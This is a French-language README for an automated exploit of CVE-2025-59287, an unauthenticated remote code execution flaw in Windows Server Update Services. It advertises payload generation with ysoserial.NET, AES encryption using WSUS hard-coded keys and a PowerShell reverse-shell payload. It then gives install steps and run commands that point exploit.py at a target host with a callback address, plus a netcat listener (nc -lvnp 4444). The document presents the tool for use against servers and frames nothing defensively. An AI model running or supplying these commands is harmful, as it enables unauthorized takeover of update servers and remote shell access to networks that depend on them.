
Exploit automatisé pour CVE-2025-59287, une RCE non authentifiée dans WSUS, avec génération de payload, écouteur de shell inversé et chiffrement AES avec clés codées en dur.
Exploit automatisé pour la vulnérabilité d'exécution de code à distance non authentifiée de Windows Server Update Services (WSUS).
✅ Génération de charge utile entièrement automatisée
✅ Téléchargement automatique de la dépendance ysoserial.NET
✅ Écouteur de shell inversé intégré
✅ Prise en charge multiplateforme (Windows/Linux/Mac)
✅ Chiffrement AES avec les clés codées en dur de WSUS
✅ Charge utile de shell inversé PowerShell
pip install -r requirements.txt
sudo apt install wine-stable
sudo apt install mono-complete
Clonez ou téléchargez les fichiers de l'exploit
cd CVE-2025-59287-exploit
Exécutez l'exploit (téléchargement automatique de ysoserial.NET)
python3 exploit.py -u http://cible:8530 -lhost VOTRE_IP -lport 4444
python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444
Terminal 1 : Démarrez l'écouteur netcat
nc -lvnp 4444
Terminal 2 : Exécutez l'exploit sans écouteur intégré
python3 exploit.py -u http://cible:8530 -lhost 10.10.14.5 -lport 4444 --no-listener